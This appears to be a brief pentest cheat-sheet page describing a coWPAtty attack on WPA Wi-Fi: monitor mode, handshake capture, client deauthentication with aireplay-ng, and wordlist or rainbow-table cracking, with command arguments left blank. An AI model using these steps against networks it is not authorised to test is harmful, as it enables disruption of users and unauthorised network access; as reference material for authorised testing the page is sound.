cowpatty_attack

COWPATTY ATTACK

coWPAtty Attack

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start

Start an Airodump capture, filtering on the AP channel and BSSID, saving the file to disk:

airodump-ng -c --bssid -w

Deauthenticate a connected client to force it to complete the 4-way handshake:

aireplay-ng -0 1 -a -c

To crack the WPA password with coWPAtty in wordlist mode:

cowpatty -r -f -2 -s

To use rainbow table mode with coWPAtty, first generate the hashes:

genpmk -f -d -s

Run coWPAtty with the generated hashes to recover the WPA password:

cowpatty -r -d -2 -s

Last updated

Was this helpful?